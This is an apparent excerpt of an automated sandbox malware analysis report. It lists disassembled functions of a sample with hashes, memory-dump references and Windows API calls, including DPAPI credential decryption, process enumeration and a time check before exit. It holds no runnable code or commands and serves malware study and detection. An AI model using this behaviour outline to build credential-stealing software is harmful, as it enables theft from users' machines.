                                  • Instruction ID: 9f4a39c941665b899a1bd507523d7dd57a57a6fe3713332570db5a1af3c98148
                                  • Opcode Fuzzy Hash: f41b077491c12518c461b1b751b4245f27b03c69dda6a53cf2b7b1f91b508106
                                  • Instruction Fuzzy Hash: 3EB236F3A0C2049FE3046E29EC8567AFBE9EF94720F1A493DE6C5C7344EA3558058697
                                  Function 0060CDC9 Relevance: 7.8, Strings: 5, Instructions: 1577COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $Aov$F;7}$K~xz$gb?o$v>yW
                                  • API String ID: 0-1235763310
                                  • Opcode ID: 0a8706f0a944afbddc4cb3760c32d39a47808cdac4c3363097fa0e74615f2a65
                                  • Instruction ID: fd74fadfc8959bdd270048fa47b4ddc61345a4a1649c628bd9505984c0dcc8bb
                                  • Opcode Fuzzy Hash: 0a8706f0a944afbddc4cb3760c32d39a47808cdac4c3363097fa0e74615f2a65
                                  • Instruction Fuzzy Hash: 3FA217F360C204AFE304AE2DEC8567AFBE9EF94720F164A3DE6C4C7744E67558018696
                                  Function 0023C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0023C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0023C87C
                                  • lstrcat.KERNEL32(?,00250B46), ref: 0023C943
                                  • lstrcat.KERNEL32(?,00250B47), ref: 0023C957
                                  • lstrcat.KERNEL32(?,00250B4E), ref: 0023C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: fefde89f41f0a3500b6005adb53a0edecd7abea44e849a6c85e18aebf41abdac
                                  • Instruction ID: 651827506652c487e9d97ced1120a43ba8b9b26b59447ab4093e86b0802c86a0
                                  • Opcode Fuzzy Hash: fefde89f41f0a3500b6005adb53a0edecd7abea44e849a6c85e18aebf41abdac
                                  • Instruction Fuzzy Hash: 98419CB491420ADFCB10DFA0DD89BFEB7B8BB88304F1045B8E509A7280D7705A94CF96
                                  Function 00246920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 0024696C
                                  • sscanf.NTDLL ref: 00246999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002469B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002469C0
                                  • ExitProcess.KERNEL32 ref: 002469DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 5d03fc5cace30383f04ab1419d39bf1acf756ee01e236539c7f31328c4870e42
                                  • Instruction ID: 0b79a249584cbe5d194e60adb5efc2d9453ba62b0b39c58e36c66257f934160e
                                  • Opcode Fuzzy Hash: 5d03fc5cace30383f04ab1419d39bf1acf756ee01e236539c7f31328c4870e42
                                  • Instruction Fuzzy Hash: 5D210175D14209ABCF08EFE4D9499EEB7B5FF48300F04452EE40AE3250EB345615CB6A
                                  Function 00237240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0023724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00237254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00237281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 002372A4
                                  • LocalFree.KERNEL32(?), ref: 002372AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 1697febc95737cb51cee0d1039fa269f7db4287e83ae298b76418c674c77a7db
                                  • Instruction ID: 9a1b9c16470d0f90a35e4bf968a2a9db4a58456f10f2fb648e6cc541ec1905d3
                                  • Opcode Fuzzy Hash: 1697febc95737cb51cee0d1039fa269f7db4287e83ae298b76418c674c77a7db
                                  • Instruction Fuzzy Hash: 590112B5A40208BBDB14DFD4CD4AF9E7778EB44701F104554FB09BB2C0D6B0AA548B6A
                                  Function 00249600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0024961E
                                  • Process32First.KERNEL32(00250ACA,00000128), ref: 00249632
                                  • Process32Next.KERNEL32(00250ACA,00000128), ref: 00249647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0024965C
                                  • CloseHandle.KERNEL32(00250ACA), ref: 0024967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: ac5ead45b00df3f1bd53b519b72a4013f49b87a4453aba74d6cbccded8d3e3ee
                                  • Instruction ID: 0929b4da928b0528e59150b1a3c1f0bbf92830483b6b5312dd7401cafecf93da
                                  • Opcode Fuzzy Hash: ac5ead45b00df3f1bd53b519b72a4013f49b87a4453aba74d6cbccded8d3e3ee
                                  • Instruction Fuzzy Hash: B3011E75A10208EBCB28DFA5CD48BEEB7F8EF48301F114198A90997240D7759BA0CF51
                                  Function 00606ABA Relevance: 7.1, Strings: 5, Instructions: 818COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: >3h[$>3h[$BQ{v$CL~:$g`oo
                                  • API String ID: 0-1390710434
                                  • Opcode ID: b791c690b35990affaaf156f7df2c7d1cb0b8001974c3c8e8bc2fde49fc3b179
                                  • Instruction ID: 8423a0eab23909f8a9735f60127ca9809a3fd2d725966ad1f1b3db80f9577af1
                                  • Opcode Fuzzy Hash: b791c690b35990affaaf156f7df2c7d1cb0b8001974c3c8e8bc2fde49fc3b179
                                  • Instruction Fuzzy Hash: 03323CF3A0C2049FE3046E2DEC8567BBBEADBD4360F1A453DEAC4C7744E93599058692
                                  Function 00248EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00235184,40000001,00000000,00000000,?,00235184), ref: 00248EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 704881639bbb55fd27fc40b5c76350a7e936c683cd286e19855f5b94adbefd4b
                                  • Instruction ID: fae0ecfd860021b959db76106edcd0eff83deb0d2aff1d1dd75c3ccd378ab5f9
                                  • Opcode Fuzzy Hash: 704881639bbb55fd27fc40b5c76350a7e936c683cd286e19855f5b94adbefd4b
                                  • Instruction Fuzzy Hash: F5111874220209BFDB08CF64D884FAF33A9AF89700F109458F9198B250DB75ECA5DBA5
                                  Function 00247A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0104F6B0,00000000,?,00250E10,00000000,?,00000000,00000000), ref: 00247A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00247A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0104F6B0,00000000,?,00250E10,00000000,?,00000000,00000000,?), ref: 00247A7D
                                  • wsprintfA.USER32 ref: 00247AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: ad1bca609986237489e414a91e222aaa247d745dff256daf099b2967094a0d0d
                                  • Instruction ID: 9aba2b17e8b29db6e5dbfd23070dc9a106c6b6dc657930d50c96558946cee360
                                  • Opcode Fuzzy Hash: ad1bca609986237489e414a91e222aaa247d745dff256daf099b2967094a0d0d
                                  • Instruction Fuzzy Hash: 5E11C2B1945228DBDB209F54CC49F59B778F740711F0003A5E91A932C0C7741A54CF51
                                  Function 00610256 Relevance: 5.4, Strings: 3, Instructions: 1684COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Aq:W$I?xO$rsl
                                  • API String ID: 0-1426323498
                                  • Opcode ID: 8baa6af1c3edaa65092110cad8031a5168887d1c8d7f5e2bb1f8e9c20af095ec
                                  • Instruction ID: 25a2cf838883b327b511dcb8105cb9b4a209bad9843c33d1c0d2bca0128db365
                                  • Opcode Fuzzy Hash: 8baa6af1c3edaa65092110cad8031a5168887d1c8d7f5e2bb1f8e9c20af095ec
                                  • Instruction Fuzzy Hash: 20B219F360C204AFE304AE2DEC8567BFBD9EB94720F1A4A3DE6C4C7744E63558058696
                                  Function 00243720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(0024E118,00000000,00000001,0024E108,00000000), ref: 00243758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 002437B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: ced9e7206bbfbd1dabb5d8a23fce6fa1e30d89ae6fbc0f8d57d7ab368473e289
                                  • Instruction ID: 5e75686d644c9ca220bbea97e480603e07f5d36aa4ddaca02f4718772ead6b5f
                                  • Opcode Fuzzy Hash: ced9e7206bbfbd1dabb5d8a23fce6fa1e30d89ae6fbc0f8d57d7ab368473e289
                                  • Instruction Fuzzy Hash: 76410970A50A289FDB28DB58CC94B9BB7B5BB48702F4041D8E608E72D0D7B1AEC5CF50
                                  Function 00239B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00239B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00239BA3
                                  • LocalFree.KERNEL32(?), ref: 00239BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
